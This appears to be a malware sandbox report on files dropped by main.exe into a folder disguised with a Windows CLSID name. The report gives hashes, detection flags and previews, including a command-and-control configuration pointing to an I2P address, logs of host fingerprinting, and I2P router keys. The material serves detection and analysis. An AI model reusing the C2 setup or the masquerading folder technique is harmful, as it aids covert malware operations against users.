                                                                                                                                                Size (bytes):213
                                                                                                                                                Entropy (8bit):5.129024990254676
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                                                                                                                                                MD5:7D88563AD41BAF4026CFC5D098CBF40D
                                                                                                                                                SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                                                                                                                                                SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                                                                                                                                                SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):104448
                                                                                                                                                Entropy (8bit):6.236071662185895
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                                                                                                                                                MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                                                                                                                                                SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                                                                                                                                                SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                                                                                                                                                SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: DF2.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ET5.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1021
                                                                                                                                                Entropy (8bit):5.462313039314351
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:CFAGHS+5lGyclY7GfyABI7cRE9FLxJ8Je0ERAXY0e:CFdHS+54yclD8cm9FLQIOi
                                                                                                                                                MD5:C78D2ABD27A3B256C0425AB4374D0C49
                                                                                                                                                SHA1:F04B5622F4436CD32B52EEFB189412E318B6AD3A
                                                                                                                                                SHA-256:7561E874DF3FC4DD8148BF7A3D3F13BC50D6A7FDFE551A37CF8BC1CA51CEB252
                                                                                                                                                SHA-512:8C223CF890A850D19AF1D128724C43F871299FE302AE6324B20EE965DE43CB620B605D895B08B03B02202E826D2927B4F92F1A9356652FB22FF8F2B0001E3E77
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8bfb51dbd)..[I] (tcp_connect) -> Done(sock=0x384,host=7

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92672
                                                                                                                                                Entropy (8bit):6.229119632298774
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                                                                                                                                                MD5:7FEA520E80E7A73252F2A5C204BBF820
                                                                                                                                                SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                                                                                                                                                SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                                                                                                                                                SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: DF2.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: ET5.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):44463
                                                                                                                                                Entropy (8bit):5.261321148614135
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ALNOTXTbX3EnIcE39EvhEkuE0kaUNB4eMzP2TApumnYh:kNOTPn5yzDOzPEAMsYh
                                                                                                                                                MD5:43C3CDA4576560A6D28E6A9B3FF959C3
                                                                                                                                                SHA1:67E8111ABBF29287B586CD15ABF8856182AC7103
                                                                                                                                                SHA-256:F8AB3EDE9EC4291E134218622DA2F3665A214B212058A48DBFD081B8B55EA0D7
                                                                                                                                                SHA-512:DED652AC77EBD0018DC27C4B1EA3CC061BB33FFDB55434A6D094C9AC33A517919B9D33E7C3F9A65CDFE45F7847AFA2D5716C1BB0E8BD2B7C53142CBFB10EEFC9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.conf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8568
                                                                                                                                                Entropy (8bit):4.958673415285098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                                                                                                                                MD5:27535CEE6740DFC50A78A0322415E67C
                                                                                                                                                SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                                                                                                                                SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                                                                                                                                SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p.su3

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):75977
                                                                                                                                                Entropy (8bit):7.8696816318811385
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                                                                                                                                                MD5:E53A179BB45CD7EDD8371740D65076BD
                                                                                                                                                SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                                                                                                                                                SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                                                                                                                                                SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\3rbwjviovpvlss4v5vg6yucxk5grzke5s7a6hwvtd5djkqwysxiq.dat

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.606056825540447
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:6TELO4RGAwjfyDuJra3T6p7ZdFFphN4yKuWEp2/N6:6TESTzOx+p7Zjx3A/A
                                                                                                                                                MD5:BB7115DCC8A875F5FE525E0BCBB8598E
                                                                                                                                                SHA1:2C6172818B3FE892023C7E4BA7DB452DDEAF5460
                                                                                                                                                SHA-256:0D69E40BDED9B383911AC3D5872191974A95AF3AEF78F67ADC05F2FB3BE55BF2
                                                                                                                                                SHA-512:F64C3DD8DA7F977CA5E285570DC3DD59D28FB95BAE67BBF19A945396527C3C189ABEEFF9560CEF7F61A02B617E16E721F155DE1CD6C1D11845B77FDD186CD7F5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.c.....=.......Yl....b,.?m.}.4O.4.+Au.c.....l_B...j.{.?9..f..uD....U..z..8../e#..n.....`7.p.|....($..J;Q..U4+A.G........_U\...)."..(...ug..m.*l....u.]..H........ lr.\0....[.\..`.......C*.../G.+.>....1..<l6i.P.....?wJ]..G.._....U...C)...]e.z..U#....||EM.?....7..;X..aO..l.I.....iq..}L..U.....0x.w.d......=.).X......{...L...,...W.c>.v....wT.c....?.....uNS.w6......g...J-Rpx.a....[...%....\V.w9.w[.;._..w/M..4.0A.X.![...S..ZM..=..4J.^.e.:.Pkl8.R..r$C...7.R...Z......h.h.\.$.F..Z...5..p..W.Y.r

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\73dgiurxbvpdyy6mhowkfkagl333wom66crad6c3wxcux4d2l4xq.dat

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.557821836618357
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:SpiPTEJTsq+/EbVJsratqMu3Nhj2FZ+EhKivEY:SQPTEpCe4AIXvEAivl
                                                                                                                                                MD5:D83C021597EEBCE39A95DFF1C978100B
                                                                                                                                                SHA1:64C0BB0741323CB6CE1048A46252316382E79DAB
                                                                                                                                                SHA-256:2935B87EF7E254010083DB699D50F599B4D61D0800AE42D910EDF742B2004AB2
                                                                                                                                                SHA-512:0506658136A793DE61261954DDF2443C9E6AF8413CCE2B58F105FCA171069BB045E9CEABE5502799F230F2EAC0138700D19067B96DC7A7B4C54E2F59A9E87B2E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.k.v.D..w+]..@O.x..P.%...H.]'... b...}vD3../x"3..r.......S..{@5R(...."#...0.h#.....M..d...".=.?`..Lg...)G.P..!@v.'B.+YH....)%[.d...'w|j=..d.c.....8.e..KT....5..1.l..e8....).=.MR&mnzw....x.;R ....n-.|.l._....u+?.a..D.YT%..\..L....M.I.o.....v...v..I.<.QoT-..T...F?...8..&.c.... .-.#.qn).5+...Y...2.;@..d..Z...)}4.....IR...}.S.7K.j$M+^.R.Nu...c..k...!......A.c..<.;S.Q...=(7./g.."..]2c..B.MW#.q...55...Q......7.xl6^._v..^@$L.Z.|...}.dq..f.A[.C..x..m.'.U.0ef/....3..S....._.>......e9..G..

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\dl6mdxzdbpybd2a5x3srma7llg3je2wt34jzd7xvc73nthkaszba.dat

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.587937094214244
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:gMLxkJAdkLPHqf+9A4sdRwOZuL4VeXhf7f2JFvSau+OG:JSKdwfqW9A4Ac9VqJpSaCG
                                                                                                                                                MD5:946780F5391EDFB85103F7861B78C282
                                                                                                                                                SHA1:887C3F962BBC12145850B60989121D18A5FD2438
                                                                                                                                                SHA-256:59FD827654BAE1B69DB59D0D7B3624B78515DF2DCEA153E98403F1424721B302
                                                                                                                                                SHA-512:8E04FF1007D54796B6A5BDAC273B3F9F87999884B3AF7C839A6B5302EFD914145C64185E0164DDFDC386FD1BA0C8C4B1925D56E0AC3393D5EEF0784E02F1EEDB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:....(...n..uj...@.WEFZ.......f......9...".I50...{...v.i..)..?bm..b .....u.!.-99.=J.<...u....[$*....{....0.Z}.m..*........s+DMF...+J...By.......M.^..S....C.....?.l.Rs..m..h^...D..1.$.iv.D..UF..m.3..h~G.T..H{H.>..*..\.T....%|..i.9..ZB.1~x.6.z..W`._/..B.!.....t.....Tfd.).O..{y.?..H..^...#......Y.P9.#.')7...z..K8k..?.|.$PA>..>v.qJ....=6..irD.<t.R.I>..4..w..UD$Rw.....k&(.8.:.Hi/J.I.r..`2.G...b...I7..S/4..H5.97...c=.F............. M.R.7j.c..M!0-.9.F...l..!....s......-..a..U........JFA

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\kn6tqgmwgxjglpnkbecaft6dhk6xtfbo4j5tpabkojw7dlqwrdoq.dat

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.565338382383913
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:Fx4I7MQFTy/clewppYxzhuI00nYUmgowIFhYTeJwUTj7o1W:4I7MQVy/cppYNbtnwgoHFh+ChTj7o1W
                                                                                                                                                MD5:9694810F5F86A5D5357E28095DB53639
                                                                                                                                                SHA1:B8E1E90A832A73382CC45DDC0E5014A4B59DB612
                                                                                                                                                SHA-256:AE631F9FE96E6C303BC0F424377BF548D9FB44B5D5C2868885CB1D35E77DD472
                                                                                                                                                SHA-512:B76BB6D608D0AC5EF764A4B7208B2448BB54BAEE45FBC3AC07D3196592AA9F85F4DD90B12717058EF468C20EC4856D525830D0F65E14AA08C502D67CC9C8FCE2
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..@.i..)_..oD.WL.l$e..h.....''..J.wlC...._.=...U....\.6$}R47..J..:.:...}...D5.f..GU!..(....;...k."^ ..B.0#.g]..Z.>.V.....Z.Ey.&.3.Hc..].....(K..@...&..M..R....?.@./. ;. %....h.Lu....'...e3.)CK.+.@..GQ.I....K-v.k~c...pl~%...V<B...I..4...U.LxSgB(.s.3......;......'.......#ke.........LCA.I..........`..la.....W..}Z..D..e'....k...T4>?..-.g._.@EOy.nK.].;.d.T...-@6.........o.?}g.P<..7$r.... '.....o.......k.....Z......o.H'............9.-V..y.......X,."...y.....}.e....7+..4`..%.R-.[.j..V...`..n..2

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ntcp2.keys

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):80
                                                                                                                                                Entropy (8bit):6.137492001110314
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:yM7FGtnf+3M1mcxGF3JtEiG:Z733Mcb3EiG
                                                                                                                                                MD5:40426B272F5F9746E475BC60587E4AD5
                                                                                                                                                SHA1:F444EE94302C2B1DC47C2875DEE4DC9DE54FC894
                                                                                                                                                SHA-256:A46845BE312BD7F0AC0D287569C1BB86821D57A4ACC0DDA179C4DA43E7CC82D1
                                                                                                                                                SHA-512:E5A80DCAD147B0AFC2BB4EA427E2E9A7DDF8F0132891EF34AC312AFAC8E41F5D754DB14EEB635E0589C426AE00EF17A26BE3612333090ED0810736843DD6DA60
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:8...!..8.'+1...i.S...LB.........d..X...{w..&.t.%..#`..]....FTY.({.......#

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.info

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):721
                                                                                                                                                Entropy (8bit):6.6765125652697055
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:r1MTqqqqqqqqqP6Msy/pznnL8JVmyaEoIEPiGv:rOTqqqqqqqqqP6MNBnmDov
                                                                                                                                                MD5:42981CD0425487F54154988A1FC6B498
                                                                                                                                                SHA1:D36FB7BF6AA80984CB3909B597EE01FFB6F6EB4A
                                                                                                                                                SHA-256:D5B0E5DBF32DB3BBFA12E1A479180309FE99573EE1B2E532BB420161BA9564C0
                                                                                                                                                SHA-512:315D97F3E9487D89ED18BB3AB7D7567BF399A9054ADCB857A924944F6BA107C1D5F154CD3DD4933135B22663E25B4E2FDF811A6D77836B1EA5C6993C2D5EEA06
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:......i>......*J...uO....T{...{..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M.C..7.B..eR~V.j}......I..:.'.............7.jX...........NTCP2.@.caps=.4;.s=,OPT11aEh9O04xL8nKzGntN6kadNT9A2DTEKOHMCqBR4=;.v=.2;..........SSU2.q.caps=.4;.i=,6NZ1ZUF0XzTJH4T9cNRX54Q9rWEJlXWb8iDjDcznlS8=;.s=,w0jflIrRnNICclGsvmO-E8wPKLuMcSjXPoeraOMSiH8=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;.`.`U"&..}.=.Gm..F.MbJ'..uB......@n....!@.+....A;N..r..u...

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.keys

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):455
                                                                                                                                                Entropy (8bit):6.138550964074035
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:r1UngzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIl8:r1MTqqqqqqqqqP6MzeFF
                                                                                                                                                MD5:EA558EA4FD7C9A9750DB5F528838FF11
                                                                                                                                                SHA1:1FF39A749C41A19EBB9DF74CCFED128A91F7960D
                                                                                                                                                SHA-256:24E1BF74C03FBE8D48F23DBA3433F5740C22E471D9DFE343C39404888B928ECB
                                                                                                                                                SHA-512:FD388535E0C6B20203F8CAB0264D125B31E08A200720CC8437730D22417E2679D0F6B6798FB830A7F0409CDDD8C55C22242F1177CF85DFC73E363765A7E0B18D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:......i>......*J...uO....T{...{..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M.C..7.B..eR~V.j}......I..:.'.........p.#...4.p#....S$_.nL.<.+ojh..jP...Jo...,3zN.Ph.7.Iw..T|.s:..}

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ssu2.keys

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):96
                                                                                                                                                Entropy (8bit):6.207205599611886
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:xk5bStwYfhtBkYqJUI0gFYbRKQr0CwK:xk9SBkYqJggFYb840K
                                                                                                                                                MD5:20B2B98A967C49662C19ABED42EBDB9D
                                                                                                                                                SHA1:804C454104D85770EE003433C7E879E4CD709DA6
                                                                                                                                                SHA-256:4254DD0702BD9A7F3C25936D1B0FD65183AC7BCBF873201F02932C11AD25F036
                                                                                                                                                SHA-512:CDC0261D8FD72805573C4E7E5E1B8763027BD374E1C49252801DA5010BD63454D453159C0D271FCFE786C8203F4A39266FD8E167BE0293FA6A138DACBFA1CC87
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.H.....rQ..c....(..q(.>..h....x...z.N>.!=:..&.dzY.}.l.z.T~...m..ueAt_4....p.W.=.a..u.. ..../

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9146880
                                                                                                                                                Entropy (8bit):6.674868432808522
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                                                                                                                MD5:676064A5CC4729E609539F9C9BD9D427
                                                                                                                                                SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                                                                                                                SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                                                                                                                SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

                                                                                                                                                Download File
